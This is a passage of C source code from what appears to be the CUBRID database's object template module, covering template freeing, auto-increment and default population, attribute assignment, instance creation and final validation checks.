:\n * Frees an attribute assignment template. 
If the assigment contains\n * an object template rather than a DB_VALUE, it will be freed by\n * recursively calling obj_free_template.\n *\n */\n\nstatic void\nobt_free_assignment (OBJ_TEMPASSIGN * assign)\n{\n DB_VALUE *value = NULL;\n SETREF *setref;\n int i, set_size;\n\n if (assign != NULL)\n {\n if (assign->variable != NULL)\n\t{\n\n\t DB_TYPE av_type;\n\n\t /* check for nested templates */\n\t av_type = DB_VALUE_TYPE (assign->variable);\n\t if (av_type == DB_TYPE_POINTER)\n\t {\n\t obt_free_template ((OBJ_TEMPLATE *) db_get_pointer (assign->variable));\n\t db_make_pointer (assign->variable, NULL);\n\t }\n\t else if (TP_IS_SET_TYPE (av_type) && db_get_set (assign->variable) != NULL)\n\t {\n\t /* must go through and free any elements that may be template pointers */\n\t setref = db_get_set (assign->variable);\n\t if (setref->set != NULL)\n\t\t{\n\t\t set_size = setobj_size (setref->set);\n\t\t for (i = 0; i < set_size; i++)\n\t\t {\n\t\t setobj_get_element_ptr (setref->set, i, &value);\n\t\t if (value != NULL && DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t\t\t{\n\t\t\t obt_free_template ((OBJ_TEMPLATE *) db_get_pointer (value));\n\t\t\t db_make_pointer (value, NULL);\n\t\t\t}\n\t\t }\n\t\t}\n\t }\n\n\t (void) pr_free_ext_value (assign->variable);\n\n\t if (assign->old_value != NULL)\n\t {\n\t (void) pr_free_ext_value (assign->old_value);\n\t }\n\t}\n\n (void) area_free (Assignment_area, assign);\n }\n}\n\n/*\n * obt_free_template - This frees a hierarchical object template.\n * return: none\n * template(in): object template\n *\n * Note :\n * It will be called by obt_update when the template has been applied\n * or can be called by obt_quit to abort the creation of the template.\n * Since the template can contain circular references, must be careful and\n * use a traversal flag in each template.\n *\n */\n\nstatic void\nobt_free_template (OBJ_TEMPLATE * template_ptr)\n{\n OBJ_TEMPASSIGN *a;\n int i;\n\n if (!template_ptr->traversed)\n {\n template_ptr->traversed = 1;\n\n for (i = 0; i < template_ptr->nassigns; i++)\n\t{\n\t a = template_ptr->assignments[i];\n\t if (a == NULL)\n\t {\n\t continue;\n\t }\n\n\t if (a->obj != NULL)\n\t {\n\t obt_free_template (a->obj);\n\t }\n\n\t obt_free_assignment (a);\n\t}\n\n if (template_ptr->assignments)\n\t{\n\t free_and_init (template_ptr->assignments);\n\t}\n\n (void) area_free (Template_area, template_ptr);\n }\n}\n\n/*\n * populate_auto_increment - This populates a template with the\n * auto_increment values for a class.\n * return: error code\n * template(in): template to fill out\n *\n * Note :\n * This is necessary for INSERT templates. The assignments are marked\n * so that if an assignment is later made to the template with the\n * same name. 
we don't generate an error because its ok to override\n * a auto increment value.\n * If an assignment is already found with the name, it is assumed\n * that an initial value has already been given.\n *\n */\n\nstatic int\npopulate_auto_increment (OBJ_TEMPLATE * template_ptr)\n{\n SM_ATTRIBUTE *att;\n OBJ_TEMPASSIGN *a, *exists;\n SM_CLASS *class_;\n int error = NO_ERROR;\n DB_VALUE val;\n DB_DATA_STATUS data_status;\n char auto_increment_name[AUTO_INCREMENT_SERIAL_NAME_MAX_LENGTH];\n MOP serial_class_mop = NULL, serial_mop;\n DB_IDENTIFIER serial_obj_id;\n const char *class_name;\n int cached_num;\n\n if (template_ptr->is_class_update)\n {\n return error;\n }\n\n class_ = template_ptr->class_;\n\n for (att = class_->ordered_attributes; att != NULL; att = att->order_link)\n {\n if (!(att->flags & SM_ATTFLAG_AUTO_INCREMENT))\n\t{\n\t continue;\n\t}\n\n if (att->auto_increment == NULL)\n\t{\n\t if (serial_class_mop == NULL)\n\t {\n\t serial_class_mop = sm_find_class (CT_SERIAL_NAME);\n\t }\n\n\t class_name = sm_get_ch_name (att->class_mop);\n\t if (class_name == NULL)\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t goto auto_increment_error;\n\t }\n\n\t /* get original class's serial object */\n\t SET_AUTO_INCREMENT_SERIAL_NAME (auto_increment_name, class_name, att->header.name);\n\t serial_mop = do_get_serial_obj_id (&serial_obj_id, serial_class_mop, auto_increment_name);\n\t if (serial_mop == NULL)\n\t {\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_INVALID_ATTRIBUTE, 1, auto_increment_name);\n\t goto auto_increment_error;\n\t }\n\n\t att->auto_increment = serial_mop;\n\t}\n\n exists = template_ptr->assignments[att->order];\n if (exists != NULL)\n\t{\n\t if (exists->variable == NULL || !DB_IS_NULL (exists->variable))\n\t {\n\t continue;\n\t }\n\t}\n\n a = obt_make_assignment (template_ptr, att);\n if (a == NULL)\n\t{\n\t goto auto_increment_error;\n\t}\n\n a->is_auto_increment = 1;\n a->variable = pr_make_ext_value ();\n\n if (a->variable == NULL)\n\t{\n\t goto auto_increment_error;\n\t}\n\n if (do_get_serial_cached_num (&cached_num, att->auto_increment) != NO_ERROR)\n\t{\n\t goto auto_increment_error;\n\t}\n\n db_make_null (&val);\n /* Do not update LAST_INSERT_ID during executing a trigger. */\n if (do_Trigger_involved == true || obt_Last_insert_id_generated == true)\n\t{\n\t error = serial_get_next_value (&val, &att->auto_increment->oid_info.oid, cached_num, 1, GENERATE_SERIAL);\n\t}\n else\n\t{\n\t error =\n\t serial_get_next_value (&val, &att->auto_increment->oid_info.oid, cached_num, 1, GENERATE_AUTO_INCREMENT);\n\t if (error == NO_ERROR)\n\t {\n\t obt_Last_insert_id_generated = true;\n\t }\n\t}\n if (error != NO_ERROR)\n\t{\n\t goto auto_increment_error;\n\t}\n\n db_value_domain_init (a->variable, att->type->id, att->domain->precision, att->domain->scale);\n\n (void) numeric_db_value_coerce_from_num (&val, a->variable, &data_status);\n if (data_status != NO_ERROR)\n\t{\n\t goto auto_increment_error;\n\t}\n else\n\t{\n\t template_ptr->is_autoincrement_set = 1;\n\t}\n }\n\n return error;\n\nauto_increment_error:\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n}\n\n/*\n * populate_defaults - This populates a template with the default values\n * for a class.\n * returns: error code\n * template(in): template to fill out\n *\n * Note :\n * This is necessary for INSERT templates. 
The assignments are marked\n * so that if an assignment is later made to the template with the\n * same name, we don't generate an error because its ok to override\n * a default value.\n * If an assignment is already found with the name, it is assumed\n * that an initial value has already been given and the default is\n * ignored.\n *\n */\n\nstatic int\npopulate_defaults (OBJ_TEMPLATE * template_ptr)\n{\n SM_ATTRIBUTE *att, *base_att;\n OBJ_TEMPASSIGN *a, *exists;\n SM_CLASS *class_;\n DB_VALUE base_value;\n const char *base_name;\n\n db_make_null (&base_value);\n\n if (!template_ptr->is_class_update)\n {\n class_ = template_ptr->class_;\n\n if (template_ptr->base_class != NULL)\n\t{\n\t /*\n\t * first populate with the transformed default values of the\n\t * virtual class\n\t */\n\t for (att = template_ptr->class_->attributes; att != NULL; att = (SM_ATTRIBUTE *) att->header.next)\n\t {\n\n\t /* only update the attribute if it is updatable */\n\t if (mq_is_updatable_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj))\n\t\t{\n\t\t if (mq_update_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj,\n\t\t\t\t\t &att->default_value.value, &base_value, &base_name, DB_AUTH_INSERT))\n\t\t {\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t }\n\n\t\t /* find the associated attribute definition in the base class */\n\t\t if (obt_find_attribute (template_ptr, 1, base_name, &base_att))\n\t\t {\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t }\n\n\t\t exists = template_ptr->assignments[base_att->order];\n\t\t /*\n\t\t * if the tranformed virtual default is non-NULL we use it,\n\t\t * if the underlying base default is non-NULL, we let the virtual\n\t\t * default override it to NULL\n\t\t */\n\n\t\t if (exists == NULL && (!DB_IS_NULL (&base_value) || !DB_IS_NULL (&base_att->default_value.value)))\n\t\t {\n\t\t /* who owns base_value ? 
*/\n\t\t a = obt_make_assignment (template_ptr, base_att);\n\t\t if (a == NULL)\n\t\t\t{\n\t\t\t goto memory_error;\n\t\t\t}\n\t\t a->is_default = 1;\n\t\t a->variable = pr_make_ext_value ();\n\t\t if (a->variable == NULL)\n\t\t\t{\n\t\t\t goto memory_error;\n\t\t\t}\n\t\t if (pr_clone_value (&base_value, a->variable))\n\t\t\t{\n\t\t\t goto memory_error;\n\t\t\t}\n\t\t }\n\t\t}\n\t }\n\n\t /*\n\t * change the class pointer to reference the base class rather\n\t * than the virtual class\n\t */\n\t class_ = template_ptr->base_class;\n\t}\n\n /*\n * populate with the standard default values, ignore duplicate\n * assignments if the virtual class has already supplied\n * a value for these.\n */\n for (att = class_->attributes; att != NULL; att = (SM_ATTRIBUTE *) att->header.next)\n\t{\n\t /*\n\t * can assume that the type is compatible and does not need\n\t * to be coerced\n\t */\n\n\t if (DB_VALUE_TYPE (&att->default_value.value) != DB_TYPE_NULL)\n\t {\n\n\t exists = template_ptr->assignments[att->order];\n\n\t if (exists == NULL)\n\t\t{\n\t\t a = obt_make_assignment (template_ptr, att);\n\t\t if (a == NULL)\n\t\t {\n\t\t goto memory_error;\n\t\t }\n\t\t a->is_default = 1;\n\t\t a->variable = pr_make_ext_value ();\n\t\t if (a->variable == NULL)\n\t\t {\n\t\t goto memory_error;\n\t\t }\n\t\t /* would be nice if we could avoid copying here */\n\t\t if (pr_clone_value (&att->default_value.value, a->variable))\n\t\t {\n\t\t goto memory_error;\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return (NO_ERROR);\n\nmemory_error:\n /*\n * Here we couldn't allocate sufficient memory for the template and its\n * values. Probably the template should be marked as invalid and\n * the caller be forced to throw it away and start again since\n * its current state is unknown.\n */\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n}\n\n/*\n * obt_def_object - This initializes a new template for an instance of\n * the given class.\n * return: new template\n * class(in): class of the new object\n *\n * Note :\n * This template can then be populated with assignments and given\n * to obt_update to create the instances.\n *\n */\n\nOBJ_TEMPLATE *\nobt_def_object (MOP class_mop)\n{\n OBJ_TEMPLATE *template_ptr = NULL;\n int is_class = locator_is_class (class_mop, DB_FETCH_CLREAD_INSTWRITE);\n\n if (is_class < 0)\n {\n return NULL;\n }\n if (!is_class)\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_NOT_A_CLASS, 0);\n }\n else\n {\n template_ptr = make_template (NULL, class_mop);\n }\n\n return template_ptr;\n}\n\n/*\n * obt_edit_object - This is used to initialize an editing template\n * on an existing object.\n *\n * returns: template\n * object(in): existing instance\n *\n */\n\nOBJ_TEMPLATE *\nobt_edit_object (MOP object)\n{\n OBJ_TEMPLATE *template_ptr = NULL;\n int is_class = locator_is_class (object, DB_FETCH_CLREAD_INSTWRITE);\n\n if (is_class < 0)\n {\n return NULL;\n }\n if (is_class)\n {\n /*\n * create a class object template, these are only allowed to\n * update class attributes\n */\n template_ptr = make_template (object, object);\n }\n else if (!object->is_temp)\n {\n DB_OBJECT *class_;\n /*\n * Need to make sure we have the class accessible, don't just\n * dereference obj->class. 
This gets a read lock early but that's ok\n * since we know we're dealing with an instance here.\n * Should be handling this inside make_template.\n */\n class_ = sm_get_class (object);\n if (class_ != NULL)\n\t{\n\t template_ptr = make_template (object, class_);\n\t}\n }\n\n else\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_INVALID_TEMP_OBJECT, 0);\n }\n\n return template_ptr;\n}\n\n/*\n * obt_quit - This is used to abort the creation of an object template\n * and release all the allocated storage.\n * return: error code\n * template(in): template to throw away\n *\n */\n\nint\nobt_quit (OBJ_TEMPLATE * template_ptr)\n{\n if (template_ptr != NULL)\n {\n obt_free_template (template_ptr);\n }\n\n return NO_ERROR;\n}\n\n/*\n * obt_assign - This is used to assign a value to an attribute\n * in an object template.\n * return: error code\n * template(in): object template\n * att(in):\n * base_assignment(in): non-zero if attribute/value are base class values.\n * value(in): value to assign\n * valid(in):\n *\n * Note:\n * The usual semantic checking on assignment will be performed and\n * an error returned if the assignment would be invalid.\n * If the base_assignment flag is zero (normal), the name/value pair\n * must correspond to the virtual class definition and translation\n * will be performed if this is a template on a vclass. If the\n * base_assignment flag is non-zero, the name/value pair are assumed\n * to correspond to the base class and translation is not performed.\n * If this is not a template on a virtual class, the flag has\n * no effect.\n */\n\nint\nobt_assign (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att, int base_assignment, DB_VALUE * value,\n\t SM_VALIDATION * valid)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *assign;\n DB_VALUE *actual, base_value;\n const char *base_name;\n DB_AUTH auth;\n DB_OBJECT *object;\n\n db_make_null (&base_value);\n\n if ((template_ptr == NULL) || (att == NULL) || (value == NULL))\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n goto error_exit;\n }\n\n if (validate_template (template_ptr))\n {\n goto error_exit;\n }\n\n if (!base_assignment && template_ptr->base_class != NULL\n /* Don't translate class attributes */\n && template_ptr->object != template_ptr->classobj)\n {\n /*\n * it's virtual, we could check for assignment validity before calling\n * the value translator\n */\n\n auth = (template_ptr->object == NULL) ? DB_AUTH_INSERT : DB_AUTH_UPDATE;\n\n if (mq_update_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj, value,\n\t\t\t &base_value, &base_name, auth))\n\t{\n\t goto error_exit;\n\t}\n\n /* find the associated attribute definition in the base class */\n if (obt_find_attribute (template_ptr, 1, base_name, &att))\n\t{\n\t goto error_exit;\n\t}\n\n /* switch to the translated value, who owns this ? 
*/\n value = &base_value;\n }\n\n /* check for duplicate assignments */\n assign = NULL;\n if (template_ptr->assignments)\n {\n assign = template_ptr->assignments[att->order];\n }\n\n if (assign)\n {\n if (template_ptr->discard_on_finish)\n\t{\n\t ERROR1 (error, ER_OBJ_DUPLICATE_ASSIGNMENT, att->header.name);\n\t goto error_exit;\n\t}\n }\n\n /* check assignment validity */\n object = OBT_BASE_OBJECT (template_ptr);\n actual = obt_check_assignment (att, value, valid, template_ptr->force_check_not_null);\n if (actual == NULL)\n {\n goto error_exit;\n }\n else\n {\n assign = obt_make_assignment (template_ptr, att);\n if (assign == NULL)\n\t{\n\t goto error_exit;\n\t}\n }\n\n if (actual != value)\n {\n if (assign->variable)\n\t{\n\t pr_free_ext_value (assign->variable);\n\t}\n assign->variable = actual;\n }\n else\n {\n if (assign->variable)\n\t{\n\t /*\n\t *\n\t * Clear the contents, but recycle the container.\n\t */\n\t (void) pr_clear_value (assign->variable);\n\t}\n else\n\t{\n\t assign->variable = pr_make_ext_value ();\n\t if (assign->variable == NULL)\n\t {\n\t goto error_exit;\n\t }\n\t}\n /*\n *\n * Note that this copies the set value, might not want to do this\n * when called by the interpreter under controlled conditions,\n *\n * !!! See about optimizing this so we don't do so much set copying !!!\n */\n error = pr_clone_value (value, assign->variable);\n }\n\n return error;\n\nerror_exit:\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n}\n\n/*\n * obt_assign_obt - This is used to assign another object template as\n * the value of an attribute in an object template\n * return: error code\n * template(in): object template\n * att(in):\n * base_assignment(in): non-zero if base_class assignment\n * value(in): nested object template to assign\n *\n * Note:\n * This is the way that hierarchies of nested objects are specified\n * using templates.\n * See the description of obt_assign() for more information\n * on the meaning of the base_assignment flag.\n * NOTE: obt_set_obt & obt_assign_obt were split to be consistent\n * with obt_set/obt_assign but we don't currently have a need\n * to use obt_assign_obt with a non-zero value for base_assignment.\n *\n */\n\nstatic int\nobt_assign_obt (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att, int base_assignment, OBJ_TEMPLATE * value)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *assign;\n DB_VALUE dummy_value, base_value;\n const char *base_name;\n DB_AUTH auth;\n\n db_make_null (&base_value);\n db_make_null (&dummy_value);\n\n if (value == NULL)\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n return error;\n }\n\n if (!base_assignment && template_ptr->base_class != NULL)\n {\n auth = (template_ptr->object == NULL) ? 
DB_AUTH_INSERT : DB_AUTH_UPDATE;\n if (mq_update_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj, &dummy_value,\n\t\t\t &base_value, &base_name, auth))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n /* find the associated attribute definition in the base class */\n if (obt_find_attribute (template_ptr, 1, base_name, &att))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n }\n\n if (att->domain->type != tp_Type_object)\n {\n ERROR3 (error, ER_OBJ_ATTRIBUTE_TYPE_CONFLICT, att->header.name, att->domain->type->name, tp_Type_object->name);\n }\n else\n {\n /* check duplicate assigmnent */\n assign = template_ptr->assignments[att->order];\n if (assign != NULL && template_ptr->discard_on_finish)\n\t{\n\t ERROR1 (error, ER_OBJ_DUPLICATE_ASSIGNMENT, att->header.name);\n\t}\n else\n\t{\n\t /*\n\t * obt_check_assignment doesn't accept templates, this is a rather\n\t * controled condition, the only thing we need to check for\n\t * is a valid class hierarchy\n\t */\n\t if (!sm_check_class_domain (att->domain, value->classobj))\n\t {\n\t /* if we don't free value now, it will leak */\n\t obt_free_template (value);\n\t ERROR1 (error, ER_OBJ_DOMAIN_CONFLICT, att->header.name);\n\t }\n\t else if (sm_is_reuse_oid_class (value->classobj))\n\t {\n\t obt_free_template (value);\n\t ERROR0 (error, ER_REFERENCE_TO_NON_REFERABLE_NOT_ALLOWED);\n\t }\n\t else\n\t {\n\t assign = obt_make_assignment (template_ptr, att);\n\t if (assign == NULL)\n\t\t{\n\t\t assert (er_errid () != NO_ERROR);\n\t\t error = er_errid ();\n\t\t}\n\t else\n\t\t{\n\t\t assign->obj = value;\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_set -\n * return: error code\n * template(in): attname\n * attname(in): value\n * value(in):\n *\n * Note:\n * This is just a shell around obt_assign that doesn't\n * make the base_assignment flag public.\n * Recognize the value type DB_TYPE_POINTER as meaning the pointer\n * is another template rather than an object.\n */\n\nint\nobt_set (OBJ_TEMPLATE * template_ptr, const char *attname, DB_VALUE * value)\n{\n int error = NO_ERROR;\n SM_ATTRIBUTE *att;\n\n if ((template_ptr == NULL) || (attname == NULL) || (value == NULL))\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n }\n else\n {\n if (validate_template (template_ptr))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n if (obt_find_attribute (template_ptr, 0, attname, &att))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n if (DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t{\n\t error = obt_assign_obt (template_ptr, att, 0, (OBJ_TEMPLATE *) db_get_pointer (value));\n\t}\n else\n\t{\n\t error = obt_assign (template_ptr, att, 0, value, NULL);\n\t}\n }\n\n return error;\n}\n\n/* temporary backward compatibility */\n/*\n * obt_set_obt -\n * return: error code\n * template(in):\n * attname(in):\n * value(in):\n *\n */\nint\nobt_set_obt (OBJ_TEMPLATE * template_ptr, const char *attname, OBJ_TEMPLATE * value)\n{\n DB_VALUE v;\n\n db_make_pointer (&v, value);\n\n return (obt_set (template_ptr, attname, &v));\n}\n\n/*\n * obt_set_desc - This is similar to obt_set() except that\n * the attribute is identified through a descriptor rather than\n * an attribute name.\n * return: error code\n * template(in): object template\n * desc(in): attribute descriptor\n * value(in): value to assign\n *\n */\n\nint\nobt_desc_set (OBJ_TEMPLATE * template_ptr, SM_DESCRIPTOR * desc, DB_VALUE * value)\n{\n int error = NO_ERROR;\n SM_CLASS 
*class_;\n SM_ATTRIBUTE *att;\n\n if ((template_ptr == NULL) || (desc == NULL) || (value == NULL))\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n }\n else\n {\n if (validate_template (template_ptr))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n /*\n * Note that we pass in the outer class MOP rather than an object\n * since we don't necessarily have an object at this point.\n */\n if (sm_get_descriptor_component (template_ptr->classobj, desc, 1, &class_, (SM_COMPONENT **) (&att)))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n if (DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t{\n\t error = obt_assign_obt (template_ptr, att, 0, (OBJ_TEMPLATE *) db_get_pointer (value));\n\t}\n else\n\t{\n\t error = obt_assign (template_ptr, att, 0, value, desc->valid);\n\t}\n }\n\n return error;\n}\n\n\n/*\n * create_template_object -\n * return: MOP of new object\n * template(in):\n */\n\n\nstatic MOP\ncreate_template_object (OBJ_TEMPLATE * template_ptr)\n{\n MOP mop;\n char *obj;\n SM_CLASS *class_;\n\n mop = NULL;\n\n /* must flag this condition */\n ws_class_has_object_dependencies (template_ptr->classobj);\n\n class_ = template_ptr->class_;\n\n /*\n * NOTE: garbage collection can occur in either the call to locator_add_instance\n * or vid_add_virtual_instance (which calls locator_add_instance). The object\n * we're caching can't contain any object references that aren't rooted\n * elsewhere. Currently this is the case since the object is empty\n * and will be populated later with information from the template which IS\n * a GC root.\n */\n if (class_->class_type != SM_VCLASS_CT)\n {\n obj = obj_alloc (class_, 0);\n if (obj != NULL)\n\t{\n\t mop = locator_add_instance (obj, template_ptr->classobj);\n\t}\n }\n else\n {\n /* virtual instance, base_class must be supplied */\n obj = obj_alloc (template_ptr->base_class, 0);\n if (obj != NULL)\n\t{\n\t /* allocate 2 MOP's */\n\t mop =\n\t vid_add_virtual_instance (obj, template_ptr->classobj, template_ptr->base_classobj,\n\t\t\t\t template_ptr->base_class);\n\t}\n }\n\n if (mop != NULL)\n {\n template_ptr->object = mop;\n\n /* set the label if one is defined */\n if (template_ptr->label != NULL)\n\t{\n\t db_make_object (template_ptr->label, mop);\n\t}\n\n /* if this is a virtual instance insert, cache the base instance too */\n if (template_ptr->base_class != NULL)\n\t{\n\n\t /* probably don't need the first test in the if at this point */\n\t if (mop->is_vid && !vid_is_base_instance (mop))\n\t {\n\t template_ptr->base_object = vid_get_referenced_mop (mop);\n\t }\n\t else\n\t {\n\t template_ptr->base_object = mop;\n\t }\n\t}\n }\n\n return mop;\n}\n\n/*\n * access_object - This is a preprocessing function called by\n * obt_apply_assignments.\n * return: error code\n * template(in): object template\n * object(in):\n * objptr(out): pointer to instance (returned)\n *\n * Note:\n * It ensures that the object associated with the template is locked\n * and created if necessary.\n */\nstatic int\naccess_object (OBJ_TEMPLATE * template_ptr, MOP * object, MOBJ * objptr)\n{\n int error = NO_ERROR;\n MOP classobj, mop;\n MOBJ obj;\n\n /*\n * The class and instance was already locked&fetched when the template was created.\n * The class pointer was cached since they are always pinned.\n * To avoid pinning the instance through a scope we don't control,\n * they aren't pinned during make_template but rather are \"fetched\"\n * again and pinned during obt_apply_assignments()\n * Authorization was checked when the 
template was created so don't\n * do it again.\n */\n\n if (template_ptr->is_class_update)\n {\n /* object is the class but there is no memory pointer */\n *object = OBT_BASE_CLASSOBJ (template_ptr);\n *objptr = NULL;\n return NO_ERROR;\n }\n\n obj = NULL;\n\n /*\n * First, check to see if this is an INSERT template and if so, create\n * the new object.\n */\n if (template_ptr->object == NULL)\n {\n if (create_template_object (template_ptr) == NULL)\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n }\n\n /*\n * Now, fetch/lock the instance and mark the class.\n * At this point, we want to be dealing with only the base object.\n */\n\n if (template_ptr->base_classobj != NULL)\n {\n classobj = template_ptr->base_classobj;\n mop = template_ptr->base_object;\n }\n else\n {\n classobj = template_ptr->classobj;\n mop = template_ptr->object;\n }\n\n if (mop != NULL)\n {\n error = au_fetch_instance_force (mop, &obj, AU_FETCH_UPDATE, LC_FETCH_MVCC_VERSION);\n if (error == NO_ERROR)\n\t{\n\t /* must call this when updating instances */\n\t ws_class_has_object_dependencies (classobj);\n\t}\n }\n\n if (obj == NULL)\n {\n assert (er_errid () != NO_ERROR);\n error = er_errid ();\n }\n else\n {\n mop->pruning_type = template_ptr->pruning_type;\n *object = mop;\n *objptr = obj;\n }\n\n return error;\n}\n\n/*\n * obt_convert_set_templates - Work function for obt_apply_assignments.\n * return: error code\n * setref(in): set pointer from a template\n * check_uniques(in):\n *\n * Note:\n * This will iterate through the elements of a set (or sequence) and\n * convert any elements that are templates in to actual instances.\n * It will recursively call obt_apply_assignments for the templates\n * found in the set.\n */\n\nstatic int\nobt_convert_set_templates (SETREF * setref, int check_uniques)\n{\n int error = NO_ERROR;\n DB_VALUE *value = NULL;\n OBJ_TEMPLATE *template_ptr;\n int i, set_size;\n SETOBJ *set;\n\n if (setref != NULL)\n {\n set = setref->set;\n if (set != NULL)\n\t{\n\t set_size = setobj_size (set);\n\t for (i = 0; i < set_size && error == NO_ERROR; i++)\n\t {\n\t setobj_get_element_ptr (set, i, &value);\n\t if (value != NULL && DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t\t{\n\t\t /* apply the template for this element */\n\t\t template_ptr = (OBJ_TEMPLATE *) db_get_pointer (value);\n\t\t error = obt_apply_assignments (template_ptr, check_uniques, 1);\n\t\t /* 1 means do eager flushing of (set-nested) proxy objects */\n\t\t if (error == NO_ERROR && template_ptr != NULL)\n\t\t {\n\t\t db_make_object (value, template_ptr->object);\n\t\t obt_free_template (template_ptr);\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_final_check_set - This is called when a set value is encounterd in\n * a template that is in the final semantic checking phase.\n * return: error code\n * setref(in): object template that provked this call\n * has_uniques(in):\n *\n * Note:\n * We must go through the set and look for each element that is itself\n * a template for a new object.\n * When these are found, recursively call obt_final_check to make sure\n * these templates look ok.\n */\n\nstatic int\nobt_final_check_set (SETREF * setref, int *has_uniques)\n{\n int error = NO_ERROR;\n DB_VALUE *value = NULL;\n OBJ_TEMPLATE *template_ptr;\n SETOBJ *set;\n int i, set_size;\n\n if (setref != NULL)\n {\n set = setref->set;\n if (set != NULL)\n\t{\n\t set_size = setobj_size (set);\n\t for (i = 0; i < set_size && error == NO_ERROR; i++)\n\t {\n\t setobj_get_element_ptr (set, i, 
&value);\n\t if (value != NULL && DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t\t{\n\t\t template_ptr = (OBJ_TEMPLATE *) db_get_pointer (value);\n\t\t error = obt_final_check (template_ptr, 1, has_uniques);\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_check_missing_assignments - This checks a list of attribute definitions\n * against a template and tries to locate missing\n * assignments in the template that are required\n * in order to process an insert template.\n * return: error code\n * template(in): template being processed\n *\n * Note:\n * This includes missing initializers for attributes that are defined\n * to be NON NULL.\n * It also includes attributes defined with a VID flag.\n */\n\nint\nobt_check_missing_assignments (OBJ_TEMPLATE * template_ptr)\n{\n int error = NO_ERROR;\n SM_CLASS *class_;\n SM_ATTRIBUTE *att;\n OBJ_TEMPASSIGN *ass;\n\n /* only do this if its an insert template */\n\n if (template_ptr->object == NULL)\n {\n /* use the base_class if this is a virtual class insert */\n class_ = OBT_BASE_CLASS (template_ptr);\n\n for (att = class_->ordered_attributes; att != NULL && error == NO_ERROR; att = att->order_link)\n\t{\n\n\t if (((att->flags & SM_ATTFLAG_NON_NULL) && DB_IS_NULL (&att->default_value.value)\n\t && att->default_value.default_expr.default_expr_type == DB_DEFAULT_NONE)\n\t || (att->flags & SM_ATTFLAG_VID))\n\t {\n\t ass = template_ptr->assignments[att->order];\n\t if (ass == NULL)\n\t\t{\n\t\t if (att->flags & SM_ATTFLAG_NON_NULL)\n\t\t {\n\t\t ERROR1 (error, ER_OBJ_MISSING_NON_NULL_ASSIGN, att->header.name);\n\t\t }\n\t\t if (att->flags & SM_ATTFLAG_VID)\n\t\t {\n\t\t ERROR1 (error, ER_SM_OBJECT_ID_NOT_SET, sm_ch_name ((MOBJ) (template_ptr->class_)));\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_final_check\n * return: error code\n * template(in): object template\n * check_non_null(in):\n * has_uniques(in):\n *\n */\n\nstatic int\nobt_final_check (OBJ_TEMPLATE * template_ptr, int check_non_null, int *has_uniques)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *a;\n int i;\n\n /* have we already been here ? */\n if (template_ptr->traversal == obj_Template_traversal)\n {\n return NO_ERROR;\n }\n template_ptr->traversal = obj_Template_traversal;\n\n if (validate_template (template_ptr))\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n if (!template_ptr->is_class_update)\n {\n\n /*\n * We locked the object when the template was created, this\n * should still be valid. If not, it should have been detected\n * by validate_template above.\n * Could create the new instances here but wait for a later step.\n */\n\n /*\n * Check missing assignments on an insert template, should be able\n * to optimize this, particularly when checking for uninitialized\n * shared attributes.\n */\n if (template_ptr->object == NULL)\n\t{\n\t if (obt_Enable_autoincrement == true && populate_auto_increment (template_ptr))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t }\n\n\t if (populate_defaults (template_ptr))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t }\n\n\t if (check_non_null && obt_check_missing_assignments (template_ptr))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t }\n\t}\n\n /* does this template have uniques? 
